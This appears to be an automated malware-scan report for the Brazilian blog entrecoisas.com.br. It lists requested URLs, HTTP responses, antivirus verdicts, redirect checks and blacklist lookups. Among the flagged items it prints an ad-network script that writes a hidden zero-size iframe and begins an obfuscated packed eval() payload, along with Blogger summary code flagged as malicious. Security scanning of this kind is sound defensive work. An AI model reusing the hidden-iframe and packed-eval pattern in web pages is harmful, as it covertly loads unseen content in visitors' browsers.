Scanned pages/files
Request | Server response | Status |
http://entrecoisas.com.br/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:13:58 GMT Location: http://www.entrecoisas.com.br/ Server: ghs Content-Length: 227 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.entrecoisas.com.br/ | 200 OK Content-Length: 149706 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ads.egrana.com.br/anuncio/popup/1567 | 200 OK Content-Length: 6553 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21217 Content-Type: text/javascript | clean |
http://entrecoisas.com.br//cdn.chitika.net/getads.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:00 GMT Location: http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/ Server: ghs Content-Length: 254 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/ | 404 Not Found Content-Length: 106862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
| ||
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdSuperBanner | 200 OK Content-Length: 3 Content-Type: text/html | clean |
http://lizard1301.spider.ad/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://728x90.exad.me/js/?id=6560 | 200 OK Content-Length: 120 Content-Type: text/html | clean |
http://www.linkwithin.com/widget.js | 200 OK Content-Length: 14131 Content-Type: application/x-javascript | clean |
http://entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:03 GMT Location: http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ Server: ghs Content-Length: 268 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 106918 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
| ||
http://300x250.exad.me/js/?id=6783 | 200 OK Content-Length: 121 Content-Type: text/html | clean |
http://ads.egrana.com.br/anuncio/300x250/1567 | 200 OK Content-Length: 660 Content-Type: text/html | clean |
http://ads.egrana.com.br/click.php?f=30&a=99&s=1567 | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Jul 2014 18:15:18 GMT Pragma: no-cache Location: http://ad.zanox.com/ppc/?26093113C2022580779T Server: nginx/1.0.15 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Country: LT Set-Cookie: PHPSESSID=ojgbdrah3g77608nqugiqepq01; path=/ X-Powered-By: PHP/5.4.28 | clean |
http://ad.zanox.com/ppc/?26093113c2022580779t | HTTP/1.1 302 Found Cache-Control: no-cache Connection: close Pragma: no-cache Location: /ppc/?26093113c2022580779t | clean |
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdRetangulo | 200 OK Content-Length: 3 Content-Type: text/html | clean |
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdWideSky | 200 OK Content-Length: 3 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: entrecoisas.com.br
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
GET / HTTP/1.1
Host: entrecoisas.com.br
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=entrecoisas.com.br
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://entrecoisas.com.br/
Result: entrecoisas.com.br is not infected or malware details are not published yet.
Result: entrecoisas.com.br is not infected or malware details are not published yet.